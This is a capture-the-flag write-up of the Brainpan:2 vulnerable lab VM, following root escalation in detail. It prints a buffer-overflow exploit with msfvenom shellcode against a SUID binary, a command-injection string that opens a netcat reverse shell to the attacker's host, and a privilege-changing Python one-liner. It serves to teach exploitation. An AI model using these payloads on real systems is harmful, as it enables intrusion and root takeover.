PENTEST LAB - BRAINPAN: 2 (part II: looking for root)
This is part II of the “Pentest Lab” in which I’m presenting my fight with “Brainpan:2”. In the first part I’ve gained access to the machine. Now it’s time to gain root. I’ve logged as user “anansi” using reverse shell spawned from custom app running on port 9999. Let’s have a look inside home folder
!!!SPOILER ALERT!!!
If you want to finish this challenge alone stop reading here.
anansi@brainpan2:/opt$ cd /home
cd /home
anansi@brainpan2:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 Nov 4 2013 .
drwxr-xr-x 22 root root 4096 Nov 5 2013 ..
drwx------ 2 anansi anansi 4096 Jun 6 07:03 anansi
drwx------ 4 puck puck 4096 Nov 5 2013 puck
drwxr-xr-x 3 reynard reynard 4096 Nov 7 2013 reynard
anansi@brainpan2:/home$ cd anansi
cd anansi
anansi@brainpan2:~$ ls -la
ls -la
total 28
drwx------ 2 anansi anansi 4096 Jun 6 07:03 .
drwxr-xr-x 5 root root 4096 Nov 4 2013 ..
-rw------- 1 anansi anansi 0 Nov 5 2013 .bash_history
-rw-r--r-- 1 anansi anansi 220 Nov 4 2013 .bash_logout
-rw-r--r-- 1 anansi anansi 3392 Nov 4 2013 .bashrc
-rw-r--r-- 1 anansi anansi 675 Nov 4 2013 .profile
-rw-r--r-- 1 anansi anansi 22 Jun 6 07:03 somefilename
-rwxr-xr-x 1 anansi anansi 114 Nov 4 2013 startbrainpan.sh
anansi@brainpan2:~$ cd ..
cd ..
anansi@brainpan2:/home$ ls
ls
anansi puck reynard
anansi@brainpan2:/home$ cd reynard
cd reynard
anansi@brainpan2:/home/reynard$ ls -la
ls -la
total 44
drwxr-xr-x 3 reynard reynard 4096 Nov 7 2013 .
drwxr-xr-x 5 root root 4096 Nov 4 2013 ..
-rw------- 1 reynard reynard 0 Nov 7 2013 .bash_history
-rw-r--r-- 1 reynard reynard 220 Nov 4 2013 .bash_logout
-rw-r--r-- 1 reynard reynard 3392 Nov 4 2013 .bashrc
-rwsr-xr-x 1 root root 8999 Nov 6 2013 msg_root
-rw-r--r-- 1 reynard reynard 675 Nov 4 2013 .profile
-rw-r--r-- 1 reynard reynard 154 Nov 5 2013 readme.txt
-rwxr-xr-x 1 reynard reynard 137 Nov 4 2013 startweb.sh
drwxr-xr-x 3 reynard reynard 4096 Nov 4 2013 web
anansi@brainpan2:/home/reynard$ ./msg_root
./msg_root
usage: msg_root username message
Nothing interesting in anansi folder, but I could access reynard home folder and found there an interesting app. I’ve started SimpleHTTPServer inside his folder and downloaded a binary.
anansi@brainpan2:/home/reynard$ python -m SimpleHTTPServer 12000
python -m SimpleHTTPServer 12000
Serving HTTP on 0.0.0.0 port 12000 ...
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET / HTTP/1.1" 200 -
192.168.57.1 - - [06/Jun/2014 07:33:09] code 404, message File not found
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET /favicon.ico HTTP/1.1" 404 -
192.168.57.1 - - [06/Jun/2014 07:33:09] code 404, message File not found
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET /favicon.ico HTTP/1.1" 404 -
192.168.57.1 - - [06/Jun/2014 07:33:11] "GET /msg_root HTTP/1.1" 200 -
At this point I knew that there’s probably a some way to exploit that binary. Why? That’s why:
anansi@brainpan2:/home/reynard$ ./msg_root aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault
anansi@brainpan2:/home/reynard$
Let’s make some reverse engineering.
$ gdb msg_root
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/..../msg_root...done.
(gdb) r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Starting program: /home/..../brainpan2/msg_root aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) bt
#0 0x61616161 in ?? ()
#1 0x0804872e in get_name (u=0xffffd5c3 'a' <repeats 108 times>, m=0xffffd630 'a' <repeats 87 times>) at msg_root.c:26
#2 0x0804877b in main (argc=3, argv=0xffffd434) at msg_root.c:35
I’ve checked file in hte and found some functions inside:
- save_msg
- get_name
- main
When app is executed it goes: main -> get_name -> save_msg. Looking on backtrace from crash I noticed address 0x0804872e which is inside method get_name. Disassembling this function gives code like below:
Dump of assembler code for function get_name:
0x080486a1 <+0>: push %ebp
0x080486a2 <+1>: mov %esp,%ebp
0x080486a4 <+3>: sub $0x20,%esp
0x080486a7 <+6>: movl $0x804863c,-0x4(%ebp)
0x080486ae <+13>: mov 0x8(%ebp),%eax
0x080486b1 <+16>: mov %eax,(%esp)
0x080486b4 <+19>: call 0x8048500 <strlen@plt>
0x080486b9 <+24>: cmp $0x11,%eax
0x080486bc <+27>: ja 0x80486d2 <get_name+49>
0x080486be <+29>: mov 0x8(%ebp),%eax
0x080486c1 <+32>: mov %eax,0x4(%esp)
0x080486c5 <+36>: lea -0x12(%ebp),%eax
0x080486c8 <+39>: mov %eax,(%esp)
0x080486cb <+42>: call 0x80484b0 <strcpy@plt>
0x080486d0 <+47>: jmp 0x80486ec <get_name+75>
0x080486d2 <+49>: movl $0x12,0x8(%esp)
0x080486da <+57>: mov 0x8(%ebp),%eax
0x080486dd <+60>: mov %eax,0x4(%esp)
0x080486e1 <+64>: lea -0x12(%ebp),%eax
0x080486e4 <+67>: mov %eax,(%esp)
0x080486e7 <+70>: call 0x8048540 <strncpy@plt>
0x080486ec <+75>: movl $0x7d0,(%esp)
0x080486f3 <+82>: call 0x80484c0 <malloc@plt>
0x080486f8 <+87>: mov %eax,-0x8(%ebp)
0x080486fb <+90>: mov 0xc(%ebp),%eax
0x080486fe <+93>: mov %eax,(%esp)
0x08048701 <+96>: call 0x8048500 <strlen@plt>
0x08048706 <+101>: mov %eax,0x8(%esp)
0x0804870a <+105>: mov 0xc(%ebp),%eax
0x0804870d <+108>: mov %eax,0x4(%esp)
0x08048711 <+112>: mov -0x8(%ebp),%eax
0x08048714 <+115>: mov %eax,(%esp)
0x08048717 <+118>: call 0x8048540 <strncpy@plt>
0x0804871c <+123>: mov -0x8(%ebp),%eax
0x0804871f <+126>: mov %eax,0x4(%esp)
0x08048723 <+130>: lea -0x12(%ebp),%eax
0x08048726 <+133>: mov %eax,(%esp)
=> 0x08048729 <+136>: mov -0x4(%ebp),%eax
0x0804872c <+139>: call *%eax
0x0804872e <+141>: mov -0x8(%ebp),%eax
0x08048731 <+144>: mov %eax,(%esp)
0x08048734 <+147>: call 0x8048490 <free@plt>
0x08048739 <+152>: leave
0x0804873a <+153>: ret
End of assembler dump.
The arrow points instruction that moves content of the address 4bytes before ebp and moves it to eax and then jumps to it. Here’s how this looks when user provides valid input:
Breakpoint 2, 0x08048729 in get_name (u=0xffffd644 "aaaaaaa", m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26 in msg_root.c
(gdb) i r ebp eax
ebp 0xffffd3f8 0xffffd3f8
eax 0xffffd3e6 -11290
(gdb) x $ebp-4
0xffffd3f4: 0x0804863c
(gdb) x/12xw $esp
0xffffd3d8: 0xffffd3e6 0x0804a008 0x00000012 0x6161d4b4
0xffffd3e8: 0x61616161 0xffff0061 0x0804a008 0x0804863c
0xffffd3f8: 0xffffd408 0x0804877b 0xffffd644 0xffffd64c
You can notice few 61 which corresponds to “aaaaaaa”. Command x $ebp-4 shows what will be moved to eax, address 0x0804863c is where save_msg method starts. Checking address 0x0804a008 which is ebp-8 shows that this is a memory where second argument is copied (in my case it’s a few b’s which are 0x62 below):
(gdb) x/8xw 0x0804a008
0x804a008: 0x62626262 0x62626262 0x62626262 0x62626262
0x804a018: 0x00006262 0x00000000 0x00000000 0x00000000
Moving further:
(gdb) s
Breakpoint 3, 0x0804872c in get_name (u=0xffffd644 "aaaaaaa", m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26 in msg_root.c
(gdb) i r ebp eax
ebp 0xffffd3f8 0xffffd3f8
eax 0x804863c 134514236
you can see eax is now pointing to save_msg. Providing long first argument one can overwrite memory which will be copied to eax and thus crash the app, as shown below:
Breakpoint 2, 0x08048729 in get_name (u=0xffffd60c 'a' <repeats 63 times>, m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26 in msg_root.c
(gdb) x/16xw $esp
0xffffd3a8: 0xffffd3b6 0x0804a008 0x00000012 0x6161d484
0xffffd3b8: 0x61616161 0x61616161 0x0804a008 0x61616161
0xffffd3c8: 0xffffd3d8 0x0804877b 0xffffd60c 0xffffd64c
0xffffd3d8: 0xffffd458 0xf7e6ee46 0x00000003 0xffffd484
(gdb) i r ebp eax
ebp 0xffffd3c8 0xffffd3c8
eax 0xffffd3b6 -11338
(gdb) s
Breakpoint 3, 0x0804872c in get_name (u=0xffffd60c 'a' <repeats 63 times>, m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26 in msg_root.c
(gdb) i r ebp eax
ebp 0xffffd3c8 0xffffd3c8
eax 0x61616161 1633771873
(gdb) s
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
Armed with that knowledge I started exploitation phase. My idea was simple.
Provide address to the shellcode in first argument while writing the shellcode in
the second one. So the first argument can only be the 0x0804a008 repeated few times
which gives me: perl -e 'print "\x04\x08\x08\xa0"x8;'
For the second argument I’ve needed shellcode. You can find one online or use msfvenom:
$ msfvenom -p linux/x86/exec CMD="/bin/sh" -b "x00" -f py
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 70 (iteration=0)
buf = ""
buf += "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2"
buf += "\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01"
buf += "\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70"
buf += "\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d"
buf += "\x3d\xd4\x0e\x4c\x41"
Here’s the second argument:
perl -e 'print "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'
And command in action:
anansi@brainpan2:/home/reynard$ ./msg_root `perl -e 'print "\x04\x08\x08\xa0"x8;'` `perl -e 'print "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'`
<x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'`
$ id
id
uid=1000(anansi) gid=1000(anansi) euid=104(root) groups=106(root),50(staff),1000(anansi)
$ cd /root
cd /root
$ ls -la
ls -la
total 28
drwx------ 3 root root 4096 Nov 5 2013 .
drwxr-xr-x 22 root root 4096 Nov 5 2013 ..
drwx------ 2 root root 4096 Nov 4 2013 .aptitude
-rw------- 1 root root 0 Nov 5 2013 .bash_history
-rw-r--r-- 1 root root 589 Nov 5 2013 .bashrc
-rw-r--r-- 1 root root 159 Nov 5 2013 .profile
-rw------- 1 root root 461 Nov 5 2013 flag.txt
-rw------- 1 root root 245 Nov 5 2013 whatif.txt
$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
$ cat whatif.txt
cat whatif.txt
WHAT IF I TOLD YOU
___
/ \
| ______\
(, \_/ \_/
| ._. |
\ --- /
/`-.__.'
.---'`-.___|\___
/ `.
YOU ARE NOT ROOT?
$ ls -n
ls -n
total 8
-rw------- 1 0 0 461 Nov 5 2013 flag.txt
-rw------- 1 104 106 245 Nov 5 2013 whatif.txt
I must say, the trick with the root account is a nice one. There are two accounts one named “root” and the other one “root “ (with a space on the end). The second one is the real root here. There’s still a long road before me… I looked for SUID/SGID execs:
$ find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
...
/opt/old/brainpan-1.8/brainpan-1.8.exe
...
This one in opt folder caught my attention. I found some files in that folder:
$ ls -la
ls -la
total 36
drwxrwxr-x 2 root staff 4096 Nov 5 2013 .
drwx------ 3 root root 4096 Nov 4 2013 ..
-rwsr-xr-x 1 puck puck 17734 Nov 4 2013 brainpan-1.8.exe
-rw-r--r-- 1 puck puck 1227 Nov 5 2013 brainpan.7
-rw-rw-rw- 1 puck staff 27 Nov 5 2013 brainpan.cfg
$ cat brainpan.cfg
cat brainpan.cfg
port=9333
ipaddr=127.0.0.1
Let's modify the cfg to run app on all addresses:
$ echo "port=9333" > brainpan.cfg
echo "port=9333" > brainpan.cfg
$ echo "ipaddr=0.0.0.0" >> brainpan.cfg
echo "ipaddr=0.0.0.0" >> brainpan.cfg
$ cat brainpan.cfg
cat brainpan.cfg
port=9333
ipaddr=0.0.0.0
I’ve started the app and connected from my machine:
$ nc 192.168.57.10 9444
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[______________________ WELCOME TO BRAINPAN 1.8________________________]
LOGIN AS GUEST
>> GUEST
ACCESS GRANTED
* * * *
THIS APPLICATION IS WORK IN PROGRESS. GUEST ACCESS IS RESTRICTED.
TYPE "TELL ME MORE" FOR A LIST OF COMMANDS.
* * * *
>> VIEW
ENTER FILE TO DOWNLOAD: a; nc -e /bin/sh 192.168.57.1 5600
$ nc -l -p 5600 -v
nc: listening on :: 5600 ...
nc: listening on 0.0.0.0 5600 ...
nc: connect to 192.168.57.1 5600 from 192.168.57.10 (192.168.57.10) 41003 [41003]
id
uid=1000(anansi) gid=1000(anansi) euid=1001(puck) groups=1001(puck),50(staff),1000(anansi)
We are almost the user “puck”. There are few ways to elevate our id from 1000 to 1001. I’ve show one in this post and here’s it in action:
python -c 'import os,pty;os.setresuid(1001,1001,1001);pty.spawn("/bin/bash");'
puck@brainpan2:/opt/old/brainpan-1.8$ whoami
whoami
puck
puck@brainpan2:/opt/old/brainpan-1.8$ id
id
uid=1001(puck) gid=1000(anansi) groups=1001(puck),50(staff),1000(anansi)
puck@brainpan2:/opt/old/brainpan-1.8$
Let’s check puck’s folder:
puck@brainpan2:/opt/old/brainpan-1.8$ cd /home
cd /home
puck@brainpan2:/home$ cd puck
cd puck
puck@brainpan2:/home/puck$ ls -la
ls -la
total 28
drwx------ 4 puck puck 4096 Nov 5 2013 .
drwxr-xr-x 5 root root 4096 Nov 4 2013 ..
drwxr-xr-x 3 puck puck 4096 Nov 5 2013 .backup
-rw------- 1 puck puck 0 Nov 5 2013 .bash_history
-rw-r--r-- 1 puck puck 220 Nov 4 2013 .bash_logout
-rw-r--r-- 1 puck puck 3392 Nov 4 2013 .bashrc
-rw-r--r-- 1 puck puck 675 Nov 4 2013 .profile
drwx------ 2 puck puck 4096 Nov 5 2013 .ssh
Looks clean, backup folder looks suspicious. I’ve checked it:
puck@brainpan2:/home/puck$ cd .backup
cd .backup
puck@brainpan2:/home/puck/.backup$ ls -la
ls -la
total 28
drwxr-xr-x 3 puck puck 4096 Nov 5 2013 .
drwx------ 4 puck puck 4096 Nov 5 2013 ..
-rw------- 1 puck puck 395 Nov 5 2013 .bash_history
-rw-r--r-- 1 puck puck 220 Nov 4 2013 .bash_logout
-rw-r--r-- 1 puck puck 3392 Nov 4 2013 .bashrc
-rw-r--r-- 1 puck puck 675 Nov 4 2013 .profile
drwx------ 2 puck puck 4096 Nov 4 2013 .ssh
Not empty bash_history? That’s strange:
puck@brainpan2:/home/puck/.backup$ cat .bash_history
cat .bash_history
cd /usr/local/bin
ls -l
./msg_root "comment on the latest version please"
cd /opt/brainpan/
ps aux
vi brainpan-1.8.c
cd ../archive
netstat -antp
netstat -antp | grep 9888
cd ..
ls
cd old
ls
cd brainpan-1.8
vi brainpan-1.8.c
ssh -l "root " brainpan2
vi brainpan.7
man ./brainpan.7
ls
htop
top
ls -latr
cat .bash_history
ls
mkdir .backup
mv .ssh .bash* .backup
cd .backup/
ls
clear
ls -latr
exit
puck@brainpan2:/home/puck/.backup$
So user puck can login on the root through ssh. After looking through folders I’ve done this:
puck@brainpan2:/home/puck$ mv .ssh .ssh-old
mv .ssh .ssh-old
puck@brainpan2:/home/puck$ cp -rp .backup/.ssh .
cp -rp .backup/.ssh .
puck@brainpan2:/home/puck$ ls -la
ls -la
total 32
drwx------ 5 puck puck 4096 Jun 6 10:31 .
drwxr-xr-x 5 root root 4096 Nov 4 2013 ..
drwxr-xr-x 3 puck puck 4096 Nov 5 2013 .backup
-rw------- 1 puck puck 0 Nov 5 2013 .bash_history
-rw-r--r-- 1 puck puck 220 Nov 4 2013 .bash_logout
-rw-r--r-- 1 puck puck 3392 Nov 4 2013 .bashrc
-rw-r--r-- 1 puck puck 675 Nov 4 2013 .profile
drwx------ 2 puck anansi 4096 Nov 4 2013 .ssh
drwx------ 2 puck puck 4096 Nov 5 2013 .ssh-old
puck@brainpan2:/home/puck$ ssh -l "root " brainpan2
ssh -l "root " brainpan2
ssh: connect to host brainpan2 port 22: Connection refused
Either ssh is not running or it’s running on different port.
puck@brainpan2:/home/puck$ cat /etc/ssh/sshd_config
cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details
# What ports, IPs and protocols we listen for
Port 2222
...
Got ya!
puck@brainpan2:/home/puck$ ssh -l "root " brainpan2 -p 2222
ssh -l "root " brainpan2 -p 2222
The authenticity of host '[brainpan2]:2222 ([127.0.1.1]:2222)' can't be established.
ECDSA key fingerprint is 0a:15:1c:1c:25:b0:fe:54:8a:35:45:e5:b8:02:97:1a.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '[brainpan2]:2222' (ECDSA) to the list of known hosts.
Linux brainpan2 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov 7 11:00:06 2013
root @brainpan2:~# cat /root/flag.txt
cat /root/flag.txt
!!! CONGRATULATIONS !!!
You've completed the Brainpan 2 challenge!
Or have you...?
Yes, you have! Pat yourself on the back. :-)
Questions, comments, suggestions for new VM
challenges? Let me know!
Twitter: <redacted>
Email : <redacted>
Web : http://www.techorganic.com
root @brainpan2:~#
That’s all! I must say I’ve really enjoyed this one. There were a few times when I wanted to grab my laptop and teach it how to fly but beating these moments gave me a lot of satisfaction and new experiences. See you soon!
Written on June 11, 2014